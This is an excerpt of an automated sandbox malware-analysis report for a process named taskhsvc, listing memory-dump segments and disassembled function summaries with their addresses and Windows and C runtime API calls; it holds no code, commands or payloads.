    • Source File: 00000013.00000002.1855013399.001C1000.00000020.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001C2FDB, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 119
    APIs
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT ref: 001C3000
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 001C16C0: abort.MSVCRT ref: 001C172A
      • Part of subcall function 001C16C0: __stack_chk_fail.LIBSSP-0 ref: 001C173D
      • Part of subcall function 001EA631: __stack_chk_fail.LIBSSP-0 ref: 001EA800
      • Part of subcall function 0031985E: __stack_chk_fail.LIBSSP-0 ref: 00319A18
    • time.MSVCRT ref: 001C31A4
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4826
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4871
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F48BC
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4AD9
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4B41
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4B88
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4BDA
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4D10
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4D63
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4DF6
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4E47
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4EF1
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4F37
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4F96
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4FE8
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F5076
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F50CD
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F5636
      • Part of subcall function 001F47D0: __stack_chk_fail.LIBSSP-0 ref: 001F565A
    • __stack_chk_fail.LIBSSP-0 ref: 001C31D5
      • Part of subcall function 001C2D88: __stack_chk_fail.LIBSSP-0 ref: 001C2DFB
      • Part of subcall function 001E8CDE: __stack_chk_fail.LIBSSP-0 ref: 001E8DE1
      • Part of subcall function 00206E53: abort.MSVCRT(?,?,?,?,?,?,?,?,?,001C35A2), ref: 00206EA5
      • Part of subcall function 00206E53: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001C35A2), ref: 00206EB6
      • Part of subcall function 00206E23: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,001C3569), ref: 00206E4C
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855013399.001C1000.00000020.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00273787, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 202
    APIs
    • abort.MSVCRT ref: 002737EC
    • abort.MSVCRT ref: 0027382B
      • Part of subcall function 0026D20C: __stack_chk_fail.LIBSSP-0 ref: 0026D242
    • abort.MSVCRT ref: 0027387B
      • Part of subcall function 002772C1: time.MSVCRT ref: 002772DE
      • Part of subcall function 002772C1: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002738B0), ref: 00277320
      • Part of subcall function 002772C1: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002738B0), ref: 00277346
      • Part of subcall function 0026D198: __stack_chk_fail.LIBSSP-0 ref: 0026D1CB
    • abort.MSVCRT ref: 0027395E
      • Part of subcall function 00321144: memset.MSVCRT ref: 0032117D
      • Part of subcall function 00321144: __stack_chk_fail.LIBSSP-0 ref: 00321190
    • memcpy.MSVCRT ref: 002739F6
      • Part of subcall function 00270AE8: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00273A06), ref: 00270B3F
      • Part of subcall function 00270AE8: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00273A06), ref: 00270B74
    • __stack_chk_fail.LIBSSP-0 ref: 00273AAC
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855138358.00267000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00333FC6, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 165
    APIs
    • abort.MSVCRT ref: 00334024
      • Part of subcall function 0031663E: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001DBB06), ref: 0031666A
    • abort.MSVCRT ref: 0033407F
    • abort.MSVCRT ref: 003340C1
    • abort.MSVCRT ref: 0033411F
      • Part of subcall function 00333BFD: abort.MSVCRT ref: 00333C50
      • Part of subcall function 00333BFD: abort.MSVCRT ref: 00333CED
      • Part of subcall function 00333BFD: abort.MSVCRT ref: 00333D40
      • Part of subcall function 00333BFD: __stack_chk_fail.LIBSSP-0 ref: 00333D71
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT ref: 003341E9
      • Part of subcall function 00333BC0: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00333D00), ref: 00333BF6
    • __stack_chk_fail.LIBSSP-0 ref: 0033422C
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00229D8C, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 138
    APIs
    • strcmp.MSVCRT ref: 00229E0E
    • free.MSVCRT ref: 00229E9F
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • free.MSVCRT ref: 00229E60
      • Part of subcall function 003278F5: abort.MSVCRT ref: 00327945
      • Part of subcall function 003278F5: __stack_chk_fail.LIBSSP-0 ref: 00327960
      • Part of subcall function 00317D3D: free.MSVCRT ref: 00317D98
      • Part of subcall function 00317D3D: __stack_chk_fail.LIBSSP-0 ref: 00317DAB
    • strcmp.MSVCRT ref: 00229ED1
    • __stack_chk_fail.LIBSSP-0 ref: 00229F66
      • Part of subcall function 00229AAB: __stack_chk_fail.LIBSSP-0 ref: 00229B28
      • Part of subcall function 0032587B: _stati64.MSVCRT ref: 00325913
      • Part of subcall function 0032587B: free.MSVCRT ref: 0032592C
      • Part of subcall function 0032587B: __stack_chk_fail.LIBSSP-0 ref: 003259BE
      • Part of subcall function 003213EE: abort.MSVCRT ref: 0032143E
      • Part of subcall function 003213EE: _strdup.MSVCRT ref: 00321449
      • Part of subcall function 003213EE: exit.MSVCRT ref: 0032148A
      • Part of subcall function 003213EE: __stack_chk_fail.LIBSSP-0 ref: 0032149D
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855077166.00228000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 003F6A10, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109
    APIs
    • fwrite.MSVCRT ref: 003F6A3B
    • vfprintf.MSVCRT ref: 003F6A57
    • abort.MSVCRT ref: 003F6A5C
      • Part of subcall function 003F6A70: VirtualQuery.KERNEL32 ref: 003F6B00
      • Part of subcall function 003F6A70: VirtualProtect.KERNELBASE ref: 003F6B42
      • Part of subcall function 003F6A70: GetLastError.KERNEL32 ref: 003F6B64
    • VirtualQuery.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 003F6D3B
    • VirtualProtect.KERNELBASE ref: 003F6D6C
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855588250.003F6000.00000080.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001C625A, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100
    APIs
